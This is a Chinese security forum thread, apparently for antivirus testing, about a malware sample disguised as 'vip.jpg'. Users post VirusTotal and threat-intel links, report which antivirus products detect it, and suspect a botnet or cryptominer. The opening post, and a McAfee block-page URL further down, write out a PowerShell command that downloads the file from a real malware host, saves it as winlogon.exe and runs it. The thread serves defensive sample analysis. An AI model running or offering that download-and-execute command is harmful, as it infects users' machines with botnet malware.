vip.jpg

显示全部楼层 · 发表于 2019-8-4 21:37:58

本帖最后由 2512975065 于 2019-8-4 21:56 编辑

实际上是一个可执行文件，有区段（但看不出是exe还是什么）
https://c-t.work/s/9923a013b2aa47
一会儿更新VT
https://www.virustotal.com/gui/f ... 419c00dde/detection
欢迎访问病毒源：http://us.howappyoude.club/
(new-object System.Net.WebClient).DownloadFile( 'http://us.howappyoude.club/vip.jpg','C:\ProgramData\winlogon.exe')
Start-Process -FilePath C:\ProgramData\winlogon.exe

显示全部楼层 · 发表于 2019-8-4 21:43:00

本帖最后由 llcy 于 2019-8-4 21:46 编辑

显示全部楼层 · 发表于 2019-8-4 21:44:43

卡巴(设置了始终扫描加密链接)

显示全部楼层 · 发表于 2019-8-4 21:50:57

双击党快来

显示全部楼层 · 发表于 2019-8-4 21:56:18

Microsoft

显示全部楼层 · 发表于 2019-8-4 22:02:52

edge阻止下载。

显示全部楼层 · 发表于 2019-8-4 22:43:01

本帖最后由 BE_HC 于 2019-8-4 22:44 编辑

微步情报

https://x.threatbook.cn/nodev4/vb4/article?threatInfoID=1751

域名隶属僵尸网络

显示全部楼层 · 发表于 2019-8-4 22:50:24

本帖最后由 N卡网速快于 2019-8-4 22:53 编辑

下载直接杀,点进那个网站之后cpu一直100%,应该是挖矿?

显示全部楼层 · 发表于 2019-8-4 23:19:54

本帖最后由 www-tekeze 于 2019-8-5 00:21 编辑

火绒已做通杀，智量Heur杀！有空试下双击。。

补充：图片格式无法打开，改exe双击进程都没有，改js也运行不了。

显示全部楼层 · 发表于 2019-8-4 23:32:06

Mcafee ENS 下载直接杀

访问网址：

该站点已被阻止。
http://us.howappyoude.club/%2520(new-object%2520System.Net.WebClient).DownloadFile(%2520'http://us.howappyoude.club/vip.jpg','C:/ProgramData/winlogon.exe')%2520Start-Process%2520-FilePath%2520C:/ProgramData/winlogon.exe
此网站上存在无法接受的安全风险。
McAfee 网页类别: 恶意站点
McAfee 安全评级: 不安全
Powered By: McAfee Endpoint Security
McAfee Logo

复制代码

[可疑文件] vip.jpg

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源